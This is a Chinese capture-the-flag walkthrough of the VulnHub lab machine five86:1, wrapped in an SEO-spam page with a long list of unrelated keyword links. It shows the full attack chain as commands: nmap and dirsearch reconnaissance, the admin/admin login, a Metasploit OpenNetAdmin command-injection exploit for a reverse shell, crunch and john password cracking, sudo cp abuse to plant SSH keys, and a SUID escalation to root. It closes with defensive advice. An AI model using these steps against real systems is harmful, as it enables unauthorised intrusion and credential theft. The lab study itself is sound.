当前位置: 首页 > news >正文

小门户网站模板房产官网查询系统

小门户网站模板,房产官网查询系统,宁波seo怎么做优化,门户网站静态页面five86: 1 来自 <five86: 1 ~ VulnHub> 1&#xff0c;将两台虚拟机网络连接都改为NAT模式 2&#xff0c;攻击机上做namp局域网扫描发现靶机 nmap -sn 192.168.23.0/24 那么攻击机IP为192.168.23.128&#xff0c;靶场IP192.168.23.137 3&#xff0c;对靶机进行端口服务探…

five86: 1

来自 <five86: 1 ~ VulnHub>

 

1,将两台虚拟机网络连接都改为NAT模式

2,攻击机上做namp局域网扫描发现靶机

nmap -sn 192.168.23.0/24

那么攻击机IP为192.168.23.128,靶场IP192.168.23.137

3,对靶机进行端口服务探测

nmap -sV -T4 -p- -A 192.168.23.137

扫描结果显示 3 个开放 TCP 端口

1 SSH(22/tcp)

  • 服务:OpenSSH 7.9p1(Debian 10)
  • 协议:SSH-2.0
  • Hostkey 指纹已列出:
    • RSA 2048
    • ECDSA 256
    • ED25519 256

潜在安全分析:

  • OpenSSH 7.9 属于较旧版本(2018 年左右),可能存在一些已知漏洞,如:
    • 用户枚举
    • 弱加密算法可被破解
  • 可以进行:
    • 弱口令尝试(Password guessing)
    • 公钥配置分析

2 HTTP(80/tcp)

  • 服务:Apache 2.4.38 (Debian)
  • HTTP Header 与信息:
    • Server: Apache/2.4.38 (Debian)
    • _http-title: Site doesn't have a title (text/html)
  • Robots.txt:
    • 发现路径 /ona 被禁止爬虫访问(可能存在敏感信息或后台接口)

潜在攻击面:

  • Apache 2.4.38 已知漏洞:
    • CVE-2019-0211(权限提升)
    • CVE-2019-0220(DoS)
  • /ona 路径可能是管理后台或接口,需要手动访问或枚举。
  • 可进一步扫描:
    • CMS 指纹识别
    • Web 漏洞扫描(SQLi、XSS、文件上传)

3 Webmin(10000/tcp)

  • 服务:MiniServ 1.920(Webmin)
  • Web 界面标题为空
  • Webmin 默认管理端口为 10000
  • 潜在风险:
    • Webmin 1.920 是 2019 年版本,存在多个已知漏洞:
      • CVE-2019-15107:远程命令执行(如果未打补丁)
    • 默认凭证风险(admin/admin 或弱密码)

 

4,访问80端口开放的http服务

空白页面,扫描其是否存在子目录

dirsearch -u http://192.168.23.137/ -x 403,404

http://192.168.23.137/robots.txt

http://192.168.23.137/ona/

扫描识别一下网页的指纹信息

whatweb -v http://192.168.23.137/ona/

OpenNetAdmin (ONA) 是一款基于 Web 的 IP 地址管理(IPAM)和网络管理工具,主要用于组织和管理局域网(LAN)中的 IP 地址、子网和网络设备信息。

  • 官方网站:https://www.opennetadmin.com/
  • 开源免费,通常部署在 LAMP 环境(Linux + Apache + MySQL/MariaDB + PHP)
  • 特别适合中小型企业、学校或实验室网络管理

ONA 的主要目的是 让网络管理员方便地追踪 IP 地址使用情况,管理设备、子网和 VLAN 信息

5,再扫描一下二级子目录

dirsearch -u http://192.168.23.137/ona -x 403,404

存在login登录界面

http://192.168.23.137/ona/login.php

怀疑存在弱口令,尝试爆破一下

爆破很复杂,其实账户密码都是admin,可以直接登录

6,检索一下OpenNetAdmin是否具有公开漏洞利用信息

当前版本具有命令执行漏洞,使用metaslpoit进行攻击,先搜索这个漏洞的相关攻击模块

msfconsole

search  OpenNetAdmin

use 0 或者 use exploit/unix/webapp/opennetadmin_ping_cmd_injection

options

set LHOST 192.168.23.128

set RHOSTS 192.168.23.137

run

成功getshell

 

7,再创建可交互shell

python -c 'import pty;pty.spawn("/bin/bash")'

然后进行基础的信息收集

存在5个用户,尝试进行横向移动。得到一个过于账户密码的提示:douglas的密码是十位,且包含aefhrt这些字符

8,根据提示crunch生成密码字典。

crunch 10 10 aefhrt -o passwd.txt

$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1 写入文本保存文件名保存为hash

echo '$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1' > hash

john --wordlist=passwd.txt  hash

成功切换用户

9,然后再查sudo/suid可提权的操作

可以无需密码通过sudo以jen用户权限执行cp命令。结合douglas家目录下的.ssh,将id_rsa.pub复制到/jen/.ssh目录下就能通过密钥登录了。

cp /home/douglas/.ssh/id_rsa.pub /tmp/authorized_keys

chmod 777 /tmp/authorized_keys

sudo -u jen /bin/cp /tmp/authorized_keys /home/jen/.ssh

相当于在douglas用户上完成了写公钥攻击,然后就能够ssh横向移动登录到jen

ssh jen@127.0.0.1

 

10,登录到jen用户时提示有邮件,在邮件中找到moss密码Fire!Fire!

再横向移动到moss

 

11,查看一下能够帮助suid提权的可执行文件

find / -perm -u=s 2>/dev/null

尝试执行一下这个文件

cd /home/moss/.games/

./upyourgame

结果就莫名其妙提权了,然后得到了flag

渗透链总结(攻击路径)

  1. 信息收集 → 确定 ONA 存在
    • 通过 nmap 扫描发现 80 端口服务,并在 /robots.txt 中发现 /ona 目录。
    • 使用 whatweb 识别出 OpenNetAdmin (ONA),确认其为潜在攻击入口。
  2. 弱口令 + ONA RCE → 初始 Web shell
    • 登录页面使用默认弱口令 admin/admin 成功进入系统。
    • ONA 存在已知命令注入漏洞(ping_cmd_injection),通过 Metasploit 成功获得反弹 shell。
  3. 用户提示 + 密码破解 → 获取 douglas 权限
    • 在系统信息中发现用户 douglas 的密码特征提示:10 位,由 aefhrt 字符组成。
    • 使用 crunch 生成字典,结合 john 破解 hash,成功切换到 douglas 用户。
  4. sudo 滥用 (cp) → 横向移动到 jen
    • douglas 用户被允许通过 sudo 以 jen 身份执行 /bin/cp。
    • 将公钥写入 jen 的 .ssh/authorized_keys 文件,成功切换到 jen 用户。
  5. 邮件信息泄露 → 获取 moss 密码
    • 登录 jen 用户时发现新邮件,阅读 /var/mail/jen 后得到 moss 用户的密码(Fire!Fire!)。
    • 使用凭据切换到 moss 用户。
  6. SUID 程序利用 → 获得 root
    • 使用 find / -perm -u=s 发现可疑的 SUID 程序 /home/moss/.games/upyourgame。
    • 执行该程序后直接提权至 root,成功获取最终 Flag。

攻防要点(安全建议)

  1. Web 应用防护
    • OpenNetAdmin 存在远程命令执行漏洞,应及时更新或更换安全版本。
    • 部署 Web 应用时应定期进行漏洞扫描,避免使用长期未维护的软件。
  2. 弱口令问题
    • 系统和应用均存在默认弱口令(admin/admin),这是重大安全风险。
    • 建议强制修改默认密码,启用复杂密码策略,并加入暴力破解防护(如 Fail2ban、账户锁定)。
  3. 信息泄露风险
    • 系统邮件中存储明文密码,导致凭证被轻易获取。
    • 应避免通过邮件或日志记录敏感凭证,必要时应加密存储或使用一次性链接。
  4. 最小权限原则
    • douglas 用户被授予 sudo 执行 cp 的权限,攻击者可借此横向移动。
    • 建议严格限制 sudo 配置,采用最小权限原则,仅允许必要的管理命令。
  5. SUID 程序审计
    • 非系统关键程序 /home/moss/.games/upyourgame 被设置为 SUID,直接导致本地提权。
    • 建议定期审计系统中的 SUID 文件,移除不必要的高权限可执行文件,防止被攻击者利用。
  6. 综合防御措施
    • 增加入侵检测与日志审查,及早发现异常行为(如字典爆破、大量目录扫描)。
    • 采用多层防护(网络层 + 主机层 + 应用层),避免单点失守导致整机沦陷。
    • 加强内部安全培训,提醒运维人员避免明文密码和不必要的权限配置。
http://www.dtcms.com/a/459963.html

相关文章:

  • 标识标牌网站怎么做做网站备案必须是个人还是公司
  • 毕设做网站太简单珠海网站上排名
  • 骨科医院网站优化服务商网页设计毕业设计教程
  • ae免费模板下载网站公司名字查重系统
  • 如何建立自己的网站步骤创网站 设计方案
  • 模板建站的网站wordpress赞助功能
  • 网站建设的实训报告怎么写西安知名网站建设
  • 给公司做网站费用旅游网站建设风险分析
  • 如何建设一个电影网站网页logo设计图片
  • 深圳正规网站建设服务苏州 手机网站
  • 怎么和网站合作推广wordpress微信图文采集
  • 钦州网站建设哪家便宜安徽茶叶商城网站建设
  • 陕西网站建设策划内容做网站用的hu软件
  • 怀柔高端网站建设android写wordpress
  • 汕头专业网站建设流程微信网站小游戏
  • 做招聘网站用哪个cms网站编程用什么语言好
  • 装修公司合作平台的网站王也道长头像无水印
  • 杭州网站建设商城价格装修公司加盟品牌排行榜
  • 校园网站建设调查问卷如果建设淘宝导购网站
  • 山东各地网站备案做网站需要准备什么东西
  • 建筑公司网站新闻傻瓜网站建设
  • 网页设计动画网站全屏网站 功能
  • 网站制作找网站建设杭州缘择低价
  • 西宁网站建设兼职asia 域名 知名网站
  • 招聘seo网站推广兰州网络推广关键词优化
  • 汕头建站培训网站建设需求表
  • 简单响应式网站wordpress生成tags页面
  • 在线推广企业网站的方法有哪些大家推荐永久免费的服务器
  • 买标准的网站建设公司网站建设属于什么职位
  • 上海数据开放网站建设室内平面设计软件